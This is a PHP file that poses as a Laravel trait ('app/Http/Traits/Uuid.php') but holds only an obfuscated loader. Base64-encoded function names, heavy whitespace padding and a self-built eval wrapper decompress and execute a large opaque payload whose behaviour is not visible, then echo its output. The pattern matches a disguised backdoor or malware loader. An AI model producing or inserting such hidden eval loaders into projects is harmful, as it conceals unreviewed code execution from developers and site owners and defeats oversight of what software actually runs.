<?php 
        $__='printf';$_='Loading app/Http/Traits/Uuid.php';
        



































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































                                                                                                                                                                                                                     $________;
